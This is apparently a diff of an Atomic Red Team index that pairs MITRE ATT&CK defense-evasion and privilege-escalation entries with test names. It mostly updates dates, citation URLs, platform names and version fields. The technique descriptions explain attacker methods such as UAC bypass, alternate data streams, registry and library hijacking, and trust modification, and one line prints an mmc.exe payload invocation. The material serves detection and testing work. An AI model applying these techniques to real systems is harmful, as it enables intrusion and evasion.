   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -25681,8 +25963,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -25700,7 +25982,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests:
     - name: Alternate Data Streams (ADS)
@@ -25945,7 +26226,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests:
     - name: Process Injection via mavinject.exe
@@ -25996,7 +26276,7 @@ defense-evasion:
         name: powershell
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -26009,6 +26289,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -26045,17 +26326,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -26101,9 +26382,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -26141,7 +26419,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -26160,7 +26438,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests:
     - name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
@@ -26229,7 +26506,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -26253,12 +26530,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -26342,7 +26617,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -26364,7 +26638,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
@@ -26398,12 +26672,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -26455,9 +26727,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account with admin privileges
@@ -26604,7 +26875,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -26651,7 +26921,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -26664,12 +26934,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests:
     - name: Lolbin Jsc.exe compile javascript to exe
@@ -26830,7 +27101,7 @@ defense-evasion:
         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -26852,7 +27123,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -26895,7 +27165,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -26919,8 +27189,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -26968,7 +27236,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -27006,8 +27274,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests:
     - name: User scope COR_PROFILER
@@ -27186,7 +27452,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -27238,8 +27504,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests:
     - name: Process Injection via Extra Window Memory (EWM) x64 executable
@@ -27278,23 +27542,24 @@ privilege-escalation:
         elevation_required: false
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -27341,7 +27606,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -27373,8 +27638,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27388,6 +27653,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27400,11 +27669,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests:
     - name: Scheduled Task Startup Script
@@ -27844,7 +28116,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -27933,7 +28204,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -28021,7 +28291,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests:
     - name: Append malicious start-process cmdlet
@@ -28144,7 +28413,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -28176,7 +28444,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -28199,11 +28467,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -28261,14 +28528,13 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -28369,7 +28635,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests:
     - name: Bypass UAC using Event Viewer (cmd)
@@ -29070,7 +29335,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -29104,13 +29369,11 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -29129,7 +29392,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -29143,7 +29405,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -29170,8 +29431,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -29202,7 +29463,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests:
     - name: Service Registry Permissions Weakness
@@ -29266,7 +29528,7 @@ privilege-escalation:
         name: command_prompt
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -29338,9 +29600,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -29356,7 +29618,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests:
     - name: Add a driver
@@ -29426,7 +29687,7 @@ privilege-escalation:
         elevation_required: true
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -29501,7 +29762,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests:
     - name: HKLM - Add atomic_test key to launch executable as part of user setup
@@ -29574,7 +29834,7 @@ privilege-escalation:
         elevation_required: true
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -29594,9 +29854,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -29616,9 +29881,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -29635,6 +29899,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -29668,7 +29936,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1543.003:
@@ -29824,7 +30091,6 @@ privilege-escalation:
